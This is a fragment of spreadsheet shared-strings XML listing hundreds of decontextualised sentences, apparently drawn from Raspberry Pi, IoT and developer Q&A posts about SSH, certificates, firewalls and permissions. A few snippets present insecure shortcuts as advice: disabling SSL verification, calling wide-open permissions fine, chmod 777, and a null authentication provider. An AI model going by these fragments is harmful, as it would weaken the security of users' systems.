    <t>According to 802.15.4, device has to passive scan and receive beacon frame, after then, device should transmit association request mac command to coordinator which is CC2538.</t>
  </si>
  <si>
    <t>After installing and ssh to it if I rebooted.</t>
  </si>
  <si>
    <t>But it does not expose the payload.</t>
  </si>
  <si>
    <t>Caused by: java.lang.SecurityException: com.example.androidthings.myproject was not granted this permission: android.permission.WRITE_SETTINGS."</t>
  </si>
  <si>
    <t>I've also tryed adding the unsafe--perm.</t>
  </si>
  <si>
    <t>I also tried without pairing and connecting, but it was not discovered by DeviceInformation then.</t>
  </si>
  <si>
    <t>Why won't this configuration not require an username and a password
when the client is connecting to the broker?</t>
  </si>
  <si>
    <t>I have checked the secure_file_priv setting and there is none.</t>
  </si>
  <si>
    <t>I tried to set up a wifi access point on this raspberry.</t>
  </si>
  <si>
    <t>In my code for the moment, I connect to my raspberry through bluetooth from my phone.</t>
  </si>
  <si>
    <t>Is it by
Direct connnection (a network inside a network).</t>
  </si>
  <si>
    <t>I have a project that requires a 802.15.4 network.</t>
  </si>
  <si>
    <t>I set permissions with 
so folders are 755 and files are 644.</t>
  </si>
  <si>
    <t>~Are there any other breach possibilities that I have not considered?</t>
  </si>
  <si>
    <t>The problem I have is that any press on the IR remote comes up as  rather than the decoded key value.</t>
  </si>
  <si>
    <t>Therefore I configured the first Pi as an access point.</t>
  </si>
  <si>
    <t>Invalid configuration provided for -c flag.</t>
  </si>
  <si>
    <t>Connecting and Getting the chip id with  work fine.</t>
  </si>
  <si>
    <t>I would like to be able to access and update wifi settings in my app.</t>
  </si>
  <si>
    <t>Are there better alternatives than using the FullTrustedLauncher for UWP-applications?</t>
  </si>
  <si>
    <t>Is this a firewall issue in Raspberry pi ?</t>
  </si>
  <si>
    <t>Verifying peer X.509 certificate...
  DEBUG:   iot_tls_connect L#252  ok
DEBUG:   iot_tls_connect L#262   .</t>
  </si>
  <si>
    <t>Otherwise it is a false flag.</t>
  </si>
  <si>
    <t>Tried these lines with no luck:
echo -e "\n"
echo -e "\r"
echo ""
printf "\n"
printf "\r"
Couldn't get to the password section.</t>
  </si>
  <si>
    <t>Installed both Twython and oauthlib without problem.</t>
  </si>
  <si>
    <t>Getting something like this: E: /etc/ca-certificates/update.d/jks-keystore exited with code 1. done.</t>
  </si>
  <si>
    <t>There are no certificates set up with the AWS API Gateway, so I don't think it's a problem with that.</t>
  </si>
  <si>
    <t>In the documentation for the python client for AWS Iot it is very straight forward how to specify the truststore but how do I do the same with the java client?</t>
  </si>
  <si>
    <t>But I could not authenticate the endpoint.</t>
  </si>
  <si>
    <t>No files were found to uninstall.</t>
  </si>
  <si>
    <t>I have tried using wiringPiSetupSys() function which does not require sudo access, but that does not work i.e.</t>
  </si>
  <si>
    <t>However I keep running into permission problems.</t>
  </si>
  <si>
    <t>For the scenario of theft.</t>
  </si>
  <si>
    <t>I really think this is a permissions issue, but what other permissions might I grant?</t>
  </si>
  <si>
    <t>Or is it possible that it is a firewall problem.</t>
  </si>
  <si>
    <t>I can already enroll BYOD devices and everything works fine.</t>
  </si>
  <si>
    <t>I have the original codes for each key on the remote.</t>
  </si>
  <si>
    <t>When i worked with SAS token I had the azure Digicert CA and then on the Device key and cert set as None.</t>
  </si>
  <si>
    <t>How can I find what it is trying to access and why it is denied?</t>
  </si>
  <si>
    <t>I also tried to manually grant the two android permission 
through adb command but got the "permission is not changable" error.</t>
  </si>
  <si>
    <t>But for updating the firmware, the esp32 device needs to be on a local network.</t>
  </si>
  <si>
    <t>It would seem to me that it would not connect since the old password would be used when asking to do a OTA update?</t>
  </si>
  <si>
    <t>It fetches the device token in about 17 seconds.</t>
  </si>
  <si>
    <t>I guess permission issue between Window and Docker.</t>
  </si>
  <si>
    <t>The Linux firewall is turned off.</t>
  </si>
  <si>
    <t>Trying to update status after enroll device angent.</t>
  </si>
  <si>
    <t>In a next step I configure the ProvisioningX509Sample.java.</t>
  </si>
  <si>
    <t>The same command,
python -m SimpleHTTPServer
works fine when ran in the terminal.</t>
  </si>
  <si>
    <t>I know that it isn't supposed to work on the same WiFi that the RPi is connected to, but it doesn't work on any WiFi or other routers.</t>
  </si>
  <si>
    <t>Port forwarding on the LAN router is not an option, and it has to be accessed out of the LAN, over the Internet.</t>
  </si>
  <si>
    <t>Therefore I installed letsencrypt and create a ssl certificate file.</t>
  </si>
  <si>
    <t>Unfortunately the certificates provided by the router are self signed certificates.</t>
  </si>
  <si>
    <t>When I trying to access the data, an Access denied error is displayed.</t>
  </si>
  <si>
    <t>Could it be the case in the firewall?</t>
  </si>
  <si>
    <t>Mar  2 22:12:23 raspberrypi systemd[711]: Listening on GnuPG cryptographic agent and passphrase cache (restricted).</t>
  </si>
  <si>
    <t>:)
I set up SSL with a self-signed certificate.</t>
  </si>
  <si>
    <t>However when the second Hm10 connects to it it does not require password authentication.</t>
  </si>
  <si>
    <t>Could the firewall be the problem here?</t>
  </si>
  <si>
    <t>I want to talk to my raspberry pi 3 using SSH on an Android device.</t>
  </si>
  <si>
    <t>I use opencv and pipe a X11 window through ssh.</t>
  </si>
  <si>
    <t>I installed in it MySql and I want to create the signup api.</t>
  </si>
  <si>
    <t>I have a device that requires ble hid keyboard's button's scan code = 310[dec].</t>
  </si>
  <si>
    <t>In the environment it's used, there's no "over-the-shoulder" password spying.</t>
  </si>
  <si>
    <t>I have a rpi3 in which it has a setting of auto login gui which connects to a wifi when it boots up.</t>
  </si>
  <si>
    <t>However, Chromium does not still recognize the certificate / the certificate are not being referenced.</t>
  </si>
  <si>
    <t>It is too difficult to Setting up outside External Access.</t>
  </si>
  <si>
    <t>Could this be dued to Firewall.</t>
  </si>
  <si>
    <t>This command locks joins after a certain time (in seconds).</t>
  </si>
  <si>
    <t>If you do set it to 1, and there is no interrupt registered, then the device will just reset.</t>
  </si>
  <si>
    <t>Well accesing google drive is no trivial task you need to interface with OAuth protocol so as an alternative you might want to upload to a google docs spreadsheet.</t>
  </si>
  <si>
    <t>Then I can login and do a lot of things, I haven't tried any audio yet since I don't have any speakers/headphones available.</t>
  </si>
  <si>
    <t>If you want to connect to the Pi externally, you must find the Pi's network IP.</t>
  </si>
  <si>
    <t>All the same, proceed with extreme caution.</t>
  </si>
  <si>
    <t>No
  authentication is required for Mifare Ultralight cards.</t>
  </si>
  <si>
    <t>For ssh on windows, you need either cygwin or putty.</t>
  </si>
  <si>
    <t>Or, you could check the Bluetooth id, etc.</t>
  </si>
  <si>
    <t>I did:  and then installed pycrypto again with pip.</t>
  </si>
  <si>
    <t>I think you have a problem with the permissions after installing with .</t>
  </si>
  <si>
    <t>This is a good guide on setting up SSH auth keys.</t>
  </si>
  <si>
    <t>I am programming my Raspi via SSH through my laptop and the Barcode scanner was connected to my Raspi.</t>
  </si>
  <si>
    <t>I use PuTTY to connect via SSH on Windows.</t>
  </si>
  <si>
    <t>Hope I helped
ADDED BONUS
If you want to have access to your files from outside you have to install an ftp server.</t>
  </si>
  <si>
    <t>Second, your EXISTS looks suspicious.</t>
  </si>
  <si>
    <t>The problem is that you are not coding safely.</t>
  </si>
  <si>
    <t>You may restrict the key to allow only that command.</t>
  </si>
  <si>
    <t>When connecting a registered device, or with an API key, authentication is required.</t>
  </si>
  <si>
    <t>I don't know if they are exposed through ioctls or how yet, I just started.</t>
  </si>
  <si>
    <t>You should also ensure that you get a new API key from thingspeak.com as well.</t>
  </si>
  <si>
    <t>Seems like www-data user doesn't have right access permissions to use your audio device.</t>
  </si>
  <si>
    <t>set cmd [format {cat "~/.ssh/id_rsa.pub" | ssh "root@%s" 'cat &gt;&gt; .ssh/authorized_keys'} $ip]
spawn sh -c $cmd</t>
  </si>
  <si>
    <t>You also set network parameters like the network ID and security keys used.</t>
  </si>
  <si>
    <t>Notice I didn't have to use sudo because of the way I set the permissions on test.py.</t>
  </si>
  <si>
    <t>If your problem is really the firewall all this won't help you.</t>
  </si>
  <si>
    <t>You will need to show the login screen to the user and retrieve an access code, which will be used to login.</t>
  </si>
  <si>
    <t>Try this: MySQL ERROR 1045 (28000): Access denied for user 'bill'@'localhost' (using password: YES)</t>
  </si>
  <si>
    <t>to create aliases in your shell, you shall use the  shell directive:
To run ps ax you do not need to sudo first.</t>
  </si>
  <si>
    <t>This is a network configuration issue.</t>
  </si>
  <si>
    <t>We used bluetooth beacons.</t>
  </si>
  <si>
    <t>After reinstallation, VS was now able to deploy to the RPi3 using the 'Universal' Authentication method.</t>
  </si>
  <si>
    <t>This way you can master mqtt concept without connectivity issues.</t>
  </si>
  <si>
    <t>You can first try to turn off your firewall and see if it works.</t>
  </si>
  <si>
    <t>First of all there is already at least one Java application which can record LIRC codes for any remote: IrScrutinizer at http://www.harctoolbox.org/IrScrutinizer.html
That said, you did not mention the lirc version used.</t>
  </si>
  <si>
    <t>You can install Codesys in your Raspberry Pi, but I'm not really sure how the whole thing works with Codesys.</t>
  </si>
  <si>
    <t>While this may be the case, it uses an unusual configuration.</t>
  </si>
  <si>
    <t>It won't help that you set byte currenPasswordLength = 4.</t>
  </si>
  <si>
    <t>It should work fine if you connect it using an API Key and API Token.</t>
  </si>
  <si>
    <t>To avoid this, you use locks.</t>
  </si>
  <si>
    <t>MyPi3:8116
I also noticed that msvcmon.exe was running as administrator on the pi.</t>
  </si>
  <si>
    <t>So your ESP8266 loses your code when it is rebooted.</t>
  </si>
  <si>
    <t>As you can see (from ) in the /proc partition the USB drive is detected as sda.</t>
  </si>
  <si>
    <t>ip a 
to show your IP
netstat -nr 
to check your Gateway is your Router.</t>
  </si>
  <si>
    <t>Each user has a unique ID created by Amazon when yoour skill is installed on their device.</t>
  </si>
  <si>
    <t>You should Google around for setting up ssh.</t>
  </si>
  <si>
    <t>/var/www/html/
set permissions (ATTENTION!</t>
  </si>
  <si>
    <t>If you have an Android phone handy you could try installing a WiFi Analyzer app, e.g.</t>
  </si>
  <si>
    <t>You may filter the data first, and then do decryption.</t>
  </si>
  <si>
    <t>You can use the namespace identifier to ensure it is your beacon.</t>
  </si>
  <si>
    <t>Have you checked the required access rights to the device?</t>
  </si>
  <si>
    <t>You can check your TLS security setting in your dashboard under the security tab.</t>
  </si>
  <si>
    <t>You usually need to reboot your device for the permissions to be granted.</t>
  </si>
  <si>
    <t>If you want to install all modules, it will be unethical.</t>
  </si>
  <si>
    <t>Even then however, you should avoid baking authentication credentials into your firmware.</t>
  </si>
  <si>
    <t>First, copy the private key file (e.g.</t>
  </si>
  <si>
    <t>UPDATE
I think I might have misled you with readLine not blocking.</t>
  </si>
  <si>
    <t>The IoT Edge runtime requires a hostname to generate a TLS server certificate for the Edge Hub.</t>
  </si>
  <si>
    <t>This would explain why no password is required.</t>
  </si>
  <si>
    <t>Yes I was seeing this error -- weirdly after I had everything working fine, i never thought that the .asoundrc file would have been corrupted.</t>
  </si>
  <si>
    <t>My gut feeling is to go for the latter alternative, but guts are not always trustworthy.</t>
  </si>
  <si>
    <t>You can use the network manager APIs to programmatically connect to networks or use the default launcher which has a WiFi settings section.</t>
  </si>
  <si>
    <t>If you are outside of your network, then you would need to add this to your firewall.</t>
  </si>
  <si>
    <t>But still need set username.)</t>
  </si>
  <si>
    <t>You definitely need to fetch the Lets Encrypt certificates on your own now!</t>
  </si>
  <si>
    <t>The  has a refresh method to fetch the new token.</t>
  </si>
  <si>
    <t>now 
while installing it will ask for password.</t>
  </si>
  <si>
    <t>Depending on the application you are usually fine not having an authentication pin ect.</t>
  </si>
  <si>
    <t>Also, if they are providing the IP the end user might get exposed.</t>
  </si>
  <si>
    <t>Different
  authentication methods are available and not all require SHA-256.</t>
  </si>
  <si>
    <t>Then you can remote connect the device via PowerShell or SSH.</t>
  </si>
  <si>
    <t>Since May 2018 both the endpoint and the certificates for AWS's IoT Core has changed.</t>
  </si>
  <si>
    <t>The google.cloud system requires some credentials.</t>
  </si>
  <si>
    <t>Your credentials file looks fine.</t>
  </si>
  <si>
    <t>Environment=SANE_CONFIG_DIR=/etc/scanbd/sane.d
StandardInput=null
StandardOutput=syslog
StandardError=syslog
#NotifyAccess=?</t>
  </si>
  <si>
    <t>For this you need the encrypted summoner id, which you can get with the endpoint /lol/summoner/v4/summoners/by-name/{summonerName}.</t>
  </si>
  <si>
    <t>Use the credentials you have set up on the Pi.</t>
  </si>
  <si>
    <t>You will be able to ssh into it, then use sudo raspi-config to enable ssh permanently.</t>
  </si>
  <si>
    <t>In bootloader, it set to the right ota_seq and ESP_OTA_IMG_VALID state.</t>
  </si>
  <si>
    <t>You can use the WiFi manager to avoid hard-code SSID names and password.</t>
  </si>
  <si>
    <t>It was a firewall issue.</t>
  </si>
  <si>
    <t>I believe you need to restart both when you want to perform decryption.</t>
  </si>
  <si>
    <t>The port 9095 is however not exposed via Docker, so you will only be able to access it inside the Docker network.</t>
  </si>
  <si>
    <t>Safely deleting data</t>
  </si>
  <si>
    <t>Cookie generated by remote server that identifies the user and allows authentication to the server.</t>
  </si>
  <si>
    <t>Password protection is used to ensure only authorized users (i.e.</t>
  </si>
  <si>
    <t>Confuser is a protector/obfuscator for .NET, providing great security to .NET Applications.</t>
  </si>
  <si>
    <t>When a device is locked, it needs to be "reactivated" in order to use it.</t>
  </si>
  <si>
    <t>ERROR 1045 (28000): Access denied for user '%s'@'%s' (using password: %s)</t>
  </si>
  <si>
    <t>If your intent is to use passwords for authentication (e.g.</t>
  </si>
  <si>
    <t>A unique identifier used to retrieve a paired value.</t>
  </si>
  <si>
    <t>ORA-12705: Cannot access NLS data files or invalid environment specified</t>
  </si>
  <si>
    <t>Restricting access too much can result in systems that are brittle and frustrating to users.</t>
  </si>
  <si>
    <t>It should never, ever be used when true security is required.</t>
  </si>
  <si>
    <t>Set to false to invert.</t>
  </si>
  <si>
    <t>SafariWatir drives the Safari browser the same way an end user would.</t>
  </si>
  <si>
    <t>Permissions
Requires no special permissions.</t>
  </si>
  <si>
    <t>You can separate the collector and evaluator, and use a firewall to prevent access to the collector.</t>
  </si>
  <si>
    <t>It can typically be accessed with the key combination CtrlShiftK.</t>
  </si>
  <si>
    <t>All other permissions and content must be explicitly asked for.</t>
  </si>
  <si>
    <t>Description
Envoy is a simple SSH task runner for PHP 5.4 or greater.</t>
  </si>
  <si>
    <t>Users will be able to access Licode rooms by using these    clients.</t>
  </si>
  <si>
    <t>CFLAGS can also be provided from outside of the Makefile via environment variables.</t>
  </si>
  <si>
    <t>bitcoin testnet is an alternative blockchain, used for testing.</t>
  </si>
  <si>
    <t>Encrypted archives.</t>
  </si>
  <si>
    <t>The user can revoke a previously granted permission anytime.</t>
  </si>
  <si>
    <t>The RSA SecurID Access Authenticator Tokencode is generated on a device where the RSA SecurID Access Authenticator is installed.</t>
  </si>
  <si>
    <t>A how to with topics such as the importance of Verifying the container's configuration.</t>
  </si>
  <si>
    <t>A user can log in to a system to obtain access and can then log out or log off (perform a logout / logoff) when the access is no longer needed.</t>
  </si>
  <si>
    <t>Searchable code inspection severity options.</t>
  </si>
  <si>
    <t>http://www.microsoft.com/windows/windowsmedia/howto/articles/introencoding.aspx</t>
  </si>
  <si>
    <t>Keys In General
A "key" is unique identifier used to retrieve a paired value.</t>
  </si>
  <si>
    <t>However, it seems to be unable to decode the stream:
I searched for information about the error (the results didn't enlighten me) and the warnings but couldn't really find much advice other than to install  which had already been installed.</t>
  </si>
  <si>
    <t>I have two pieces of codes.</t>
  </si>
  <si>
    <t>I was able to login via Windows, but still get the same error with permissions.</t>
  </si>
  <si>
    <t>I am trying to connect to a Raspberry Pi that has the Mosquitto broker installed.</t>
  </si>
  <si>
    <t>I also updated the firmware on my USBasp.</t>
  </si>
  <si>
    <t>This is the version page of libcab
https://www.kernel.org/pub/linux/libs/security/linux-privs/libcap2/
How can I install one of them?</t>
  </si>
  <si>
    <t>You can't use a NFC Shield and Nexus S as peers using the p2pdemo that you have specified.</t>
  </si>
  <si>
    <t>It cannot be an alias.</t>
  </si>
  <si>
    <t>In this case, you have to update the firmware on the ESP.</t>
  </si>
  <si>
    <t>(Updated)
Within Lua code, there is no security on physical access.</t>
  </si>
  <si>
    <t>The Lambda would take care of the authentication with AWS IoT.</t>
  </si>
  <si>
    <t>The application `PublicKeyToken` for a Windows application.</t>
  </si>
  <si>
    <t>Now, you can crawl without thinking about blacklisting.</t>
  </si>
  <si>
    <t>If the error persists, turn off SSL verification
but if no repo, run this to change global setting
duplicate of How do I set GIT_SSL_NO_VERIFY for specific repos only?</t>
  </si>
  <si>
    <t>manifest has the private networks, enterprise auth, and Internet (both) setup (assuming okay as works locally).</t>
  </si>
  <si>
    <t>It is a fingerprint-based system, meaning that it does not return coordinates but rather "tags" (like room numbers or names).</t>
  </si>
  <si>
    <t>You should make sure to have a firewall rule that says any TCP request coming in to the destination port of 8080 gets redirected to 192.168.0.7 (which is your RaspberryPi).</t>
  </si>
  <si>
    <t>I faced the similar problem with my client code until i figured out that it was my antivirus's firewall which was blocking arduino's client to connect.</t>
  </si>
  <si>
    <t>Overall XACML 2.0 and XACML 3.0 achieve the same functionality which is to define fine-grained, attribute-based access control policies.</t>
  </si>
  <si>
    <t>Sometimes happen that the program hangs, even if the code is protected by a try/catch block.</t>
  </si>
  <si>
    <t>This behavior requires hardware support for protected memory which may not be available in some microprocessors.</t>
  </si>
  <si>
    <t>What I need now is an easy and safe remote control to arm the system and disarm it.</t>
  </si>
  <si>
    <t>---For no background, start here---
When I run my java program normally, the connection between programs is made fine, but it cannot run the C portion of the code without being root.</t>
  </si>
  <si>
    <t>my question is, since the pi is making the connection to the server, will this cause any firewall problems?</t>
  </si>
  <si>
    <t>Yes, this can be done by making the ESP a captive portal, especially since you have set the ESP as an access point.</t>
  </si>
  <si>
    <t>There's no need to run any external tool which makes it transparent for developers to use.</t>
  </si>
  <si>
    <t>It seems like this is because docker doesn't have privileged set to true, however because I am doing this through IoT edge I can't input this through the CLI.</t>
  </si>
  <si>
    <t>A number of tests were conducted, which proved that libnids predicts behaviour of protected Linux hosts as closely as possible.</t>
  </si>
  <si>
    <t>I already used this combination to connect to my parents wifi (WPA with a non-hidden wifi) successfully.</t>
  </si>
  <si>
    <t>When i boot the Yun, ssh onto it and start the parent-process (server.js) with "node server.js", everything is working fine.</t>
  </si>
  <si>
    <t>I would like to know how can i achieve installing an app silently in the background, with out rooting the device.</t>
  </si>
  <si>
    <t>By the way, I have changed my port to, say, 30 in my sshd config file for security reason.</t>
  </si>
  <si>
    <t>I'm thinking there's some acknowledgement or flag that stops code execution, but I have no idea.</t>
  </si>
  <si>
    <t>Here I am sharing my code to get the more clarity,
When I am running the same code in iPad mini, I am able to login into AWS iOT successfully but it is not in iPhone(7, 7Plus, 8Plus).</t>
  </si>
  <si>
    <t>So it's not a Driver Signature Enforcement problem from Windows 7/64.</t>
  </si>
  <si>
    <t>The solution is:
1) Start your computer and log on as an administrator.</t>
  </si>
  <si>
    <t>The topics in this section describe the validation controls and how to use them.</t>
  </si>
  <si>
    <t>It is a device identification string supplied by the Plug and Play Manager.</t>
  </si>
  <si>
    <t>To get the public key token, you can run that code : 
Now i have no idea why this step is not necessary into windows, but a have to do into linux...</t>
  </si>
  <si>
    <t>HAMMER is a file system written for DragonFly that provides instant crash recovery, multi-volume file systems, integrity checking, fine grained history/undo, networked mirroring, and historical snapshots.</t>
  </si>
  <si>
    <t>However, accessing the sysfs requires sudo access, and that's bad for obvious reasons.</t>
  </si>
  <si>
    <t>Can I not use hardware pwm without root or am I missing a fundamental step?</t>
  </si>
  <si>
    <t>When I stop the process, I am given
Access Denied 
when I try to access it again.</t>
  </si>
  <si>
    <t>I've tried running as root just to check, also same exception.</t>
  </si>
  <si>
    <t>Tried setting the execution policy to bypass, unrestricted.</t>
  </si>
  <si>
    <t>In the below code iot.listCertificates executes perfectly and i am able to see all certificates in AWS IOT console but when I try to execute command iot.createKeysAndCertificate it gives me NETWORK FAILURE ERROR.</t>
  </si>
  <si>
    <t>Please Note: I don't want the new password to stay when Arduino is power off.</t>
  </si>
  <si>
    <t>Try to run as an administrator...
Run terminal, type sudo arduino, type your root password, and... :)</t>
  </si>
  <si>
    <t>The easiest (IMHO) is to SSH in to the RPi from another computer and forward X11.</t>
  </si>
  <si>
    <t>If so, I do not have the technical detail on how to accomplish that - but from a security perspective that is not a great idea.</t>
  </si>
  <si>
    <t>This will give a bluetooth pan bridged to your eth0 network (and thus use your existing dhcp/dns server etc).</t>
  </si>
  <si>
    <t>If you don't have an auths section, then exclude that line from your file.</t>
  </si>
  <si>
    <t>Note that more than one link in a document can use the same ACCESSKEY setting.</t>
  </si>
  <si>
    <t>Note: The ellipses in the TwitterContext parameters indicates that you need to provide an authorizer with credentials, which is required.</t>
  </si>
  <si>
    <t>For example, setting the admin theme in the Admin_Controller, or making sure the user is logged in with the Authenticated_Controller.</t>
  </si>
  <si>
    <t>see code from here: Connect to captive portal wifi using ESP8266
Result required is "yay it connects through this Captive Portal protected network and to the internet beyond"</t>
  </si>
  <si>
    <t>If you have to enter a username and password to connect to the your college Wi-Fi network - your college is probably not using WEP, WPA, and WPA2 in the normal 'home Wi-Fi' configuration.</t>
  </si>
  <si>
    <t>Other solution is to buy BT HID module, but they are more expensive (about 10 times)</t>
  </si>
  <si>
    <t>You then need to do the opposite in the C++ code (which should be much more elegant) and check for invalid key combinations (e.g.</t>
  </si>
  <si>
    <t>You have to disable the chip via bus power.</t>
  </si>
  <si>
    <t>This point requires that the output.pdf, that you created, is trustworthy.</t>
  </si>
  <si>
    <t>You should also make sure you have the necessary protection circuits in place.</t>
  </si>
  <si>
    <t>Java Path Finder (JPF) is a highly customizable execution environment for verification of Java bytecode programs.</t>
  </si>
  <si>
    <t>Set the  protection to
  read only.</t>
  </si>
  <si>
    <t>I've actually followed this tutoriel : https://www.sheevaboite.fr/articles/installer-serveur-git-auto-heberge-partie-1 but set up a password for user git instead of not.</t>
  </si>
  <si>
    <t>The device is not detected by none of the three devices I've tried (two computers and a smartphone).</t>
  </si>
  <si>
    <t>no login page, NO update or other popups are shown.</t>
  </si>
  <si>
    <t>I am trying to get Internet access in raspberry pi after connecting it to my laptop via SSH.</t>
  </si>
  <si>
    <t>I have also configured password-less ssh so that master (i7 pc) could launch a process in raspberry-pis.</t>
  </si>
  <si>
    <t>Folks, I'm spying on traffic coming from one of my Internet devices.</t>
  </si>
  <si>
    <t>I'd like to discover as much information about IoT devices on a network as possible.</t>
  </si>
  <si>
    <t>I cannot debug as the pi is in another location and I am using SSH to remote into it.</t>
  </si>
  <si>
    <t>and then
avrdude: ser_open(): can't open device "\.\COM2": Access is denied.</t>
  </si>
  <si>
    <t>Is is possible to use some external crypto unit?</t>
  </si>
  <si>
    <t>However, because the considerations of security, firewalls and complexity we cannot go this way.</t>
  </si>
  <si>
    <t>Is this a thing with the Pi's firewall or something else preventing this?</t>
  </si>
  <si>
    <t>I have a user on there called  with all privileges granted.</t>
  </si>
  <si>
    <t>However, internet access is not available, because the server is being run through a hotspot created by the NodeMCU.</t>
  </si>
  <si>
    <t>I Have added Permissions:
internetClient
privateNetworkClientServer
internetClientServer
enterpriseAuthentication
videosLibrary
removableStorage
remoteSystem
FileTypeAssociation are set in manifest.</t>
  </si>
  <si>
    <t>So I'm fine with overprivileged links and the magic command.</t>
  </si>
  <si>
    <t>I'm noticing something strange: It works, but I need to SSH into the Pi in order for it to run and work.</t>
  </si>
  <si>
    <t>It seem that after a week of runtime i am losing permissions?</t>
  </si>
  <si>
    <t>Power on Raspberry Pi with Rasbpian, then from Ubuntu execute this command in order to copy lib and usr folders from Raspbian to Ubuntu:
rsync -rl --delete-after --safe-links pi@xxx.xxx.xxx.xxx:/{lib,usr} $HOME/cross-compile/sysroot
where xxx.xxx.xxx.xxx is the Raspberry Pi IP
4.</t>
  </si>
  <si>
    <t>I can access it via ssh and normally install packages, ping websites etc.</t>
  </si>
  <si>
    <t>But I have to run my scipts remotely via ssh from my office PC with sourcing my config and handover parameters and such.</t>
  </si>
  <si>
    <t># Conservative choice; -D_FORTIFY_SOURCE=2 may be unsafe in some cases.</t>
  </si>
  <si>
    <t>*/
DigestAjax.AUTH_USERNAME = null;
/**
 * Value of the WWW-Authenticate header name to retrieve.</t>
  </si>
  <si>
    <t>So wide open permissions is 10000% fine.</t>
  </si>
  <si>
    <t>I'm using this command to run my container:
sudo docker run --privileged fg
The --privileged flag is so that I can access /dev/mem file on the pi, for GPIO operations.</t>
  </si>
  <si>
    <t>Is there maybe a way to wipe the whole thing while logged in to it?</t>
  </si>
  <si>
    <t>is the usual name of your private key on that machine.</t>
  </si>
  <si>
    <t>Estimote SDKs work with Estimote Cloud to confirm the ownership through a set of tokens before allowing to connect.</t>
  </si>
  <si>
    <t>The third one sets it as trusted so we can autoconnect to it later on, when in range.</t>
  </si>
  <si>
    <t>Please DO NOT supply the device password as this intended to be kept secret.</t>
  </si>
  <si>
    <t>open your  file from /home/pi/javame8/bin directory inside raspberry pi and add:
authentication.provider = com.oracle.meep.security.NullAuthenticationProvider
under [internal] section</t>
  </si>
  <si>
    <t>To ensure integrity of any kind you need a root of trust for measurement, which is never the TPM.</t>
  </si>
  <si>
    <t>You need to implement HID device emulator on Pi in order to act like keyboard.</t>
  </si>
  <si>
    <t>http://minwinpc:8080/api/resourcemanager/processes
(you maybe prompted to login - I wasnt)
This what I see from my machine.</t>
  </si>
  <si>
    <t>I understand this and agree with the security restriction.</t>
  </si>
  <si>
    <t>Regardless how you configure https in Tomcat, you may try another approach.</t>
  </si>
  <si>
    <t>I tried it at home, without proxy, and it worked fine.</t>
  </si>
  <si>
    <t>Ensure your IoT device has internet access.</t>
  </si>
  <si>
    <t>Eg: 
This will then prompt for the Administrator user details of the device.</t>
  </si>
  <si>
    <t>That smells like filesystem or disk corruption.</t>
  </si>
  <si>
    <t>We have developed Zymkey, a Root of Trust module for Raspberry Pi and are working on LUKS-based filesystem encryption.</t>
  </si>
  <si>
    <t>At the moment, you will have to use the REST API to login into a Janus room and turn on/off the recording.</t>
  </si>
  <si>
    <t>Probably something different between user path and root not with daemon.</t>
  </si>
  <si>
    <t>user_type1_1 and corresponding secret) or a different peer in the same fabric.</t>
  </si>
  <si>
    <t>I logged in with Putty using SSH and installed Mono version 3.2.8 on the Pi: sudo apt-get install mono-complete.</t>
  </si>
  <si>
    <t>That would at least let you publish your software safely.</t>
  </si>
  <si>
    <t>After adding the Py-flasher-exe to the Ransomware-whitelist the problem went away.</t>
  </si>
  <si>
    <t>In view of this, you can decide which value you should set to your wpa_group_rekey parameter.</t>
  </si>
  <si>
    <t>Then you have a very very small window to have the key pressed to pickup the key.</t>
  </si>
  <si>
    <t>The user that is running the process might not have the required permission, in which case the error code would be EPERM.</t>
  </si>
  <si>
    <t>In that case, you could know if you can login successfully directly with browser.</t>
  </si>
  <si>
    <t>Think about most Bluetooth devices you use, none of them have any authentication you can just click pair.</t>
  </si>
  <si>
    <t>Try logging into the raspberry pi directly using the console.</t>
  </si>
  <si>
    <t>AppKey is the encryption key used for messages during every over the air activation.</t>
  </si>
  <si>
    <t>I couldn't set the -p to less than 2048 and -n 4 without Jack crashing and there was about 140ms latency.</t>
  </si>
  <si>
    <t>That means that when your RPi accesses the internet, it does that through your router, using its public IP.</t>
  </si>
  <si>
    <t>You may not want to log USB traffic.</t>
  </si>
  <si>
    <t>It ensures that the data cannot be tampered with once it is written to the device.</t>
  </si>
  <si>
    <t>Copied from https://wiki.opendaylight.org/view/Defense4All:Tutorial: Defense4All is a security SDN application for detecting and driving mitigation of DoS and DDoS attacks in different SDN topologies.</t>
  </si>
  <si>
    <t>LiveData which publicly exposes setValue(T) and postValue(T) method.</t>
  </si>
  <si>
    <t>Its virtual servers are fast, ssh ready in 30 seconds (or less).</t>
  </si>
  <si>
    <t>Linode (a contraction of "Linux Node") is a virtual private server (vps) provider based in New Jersey, and founded in 2003.</t>
  </si>
  <si>
    <t>For example, the code
is vulnerable to SQL injection if the  is the arbitrary, user provided string.</t>
  </si>
  <si>
    <t>The permissions required vary with the task.</t>
  </si>
  <si>
    <t>John also offers a brute force mode.</t>
  </si>
  <si>
    <t>Certification of applications or webpages using Skype URIs is not required, since all interactionspecifically all audio and videois through the Skype client.</t>
  </si>
  <si>
    <t>Clear Button: Removes
all recorded actions.</t>
  </si>
  <si>
    <t>Copy
  logins to the destination server.</t>
  </si>
  <si>
    <t>You can specify what parts of the application other applications can access by setting application access settings.</t>
  </si>
  <si>
    <t>PyCryptodome exposes almost the same API as the old PyCrypto so that most applications will run unmodified.</t>
  </si>
  <si>
    <t>It allows for running external server applications (such as RStudio, Shiny Server, syncthing, PostgreSQL, etc) alongside with Notebook with authenticated web access provided to all applications.</t>
  </si>
  <si>
    <t>A standard for usb CDC devices
ACM.EXE, which is an access control utility for use with Microsoft's appfabric
Please use one of the unambiguous tags shown above.</t>
  </si>
  <si>
    <t>It is an alternative to HTTP Basic or Digest authentication.</t>
  </si>
  <si>
    <t>Questions about configuration and administration of network gear should be posted on Server Fault.</t>
  </si>
  <si>
    <t>Arduino Ethernet does not seem to work on environments where 802.1x is deployed.</t>
  </si>
  <si>
    <t>If someone could verify, or help me fix this that would be great.</t>
  </si>
  <si>
    <t>I'd like to update a webpage with a shell script that requires no input, such as password.</t>
  </si>
  <si>
    <t>I will check on the [Raspberry Pi Stackexchange Site] to see if the PI has a firewall.</t>
  </si>
  <si>
    <t>2) Has anyone seen any issues with GC and AudioTrack going the deadlock route?</t>
  </si>
  <si>
    <t>Is there a way to tell libreoffice impress to skip autorecovery of files when you have no access to the machine it runs on despite ssh?</t>
  </si>
  <si>
    <t>I have an IP camera which requires a login, and so far, I have found no way around it.</t>
  </si>
  <si>
    <t>I can see that corrupted data in the charts as a regular and sequential errors.</t>
  </si>
  <si>
    <t>I have generated a SSH key via PuttyGen, uploaded to  for which I set up a 777 chmod.</t>
  </si>
  <si>
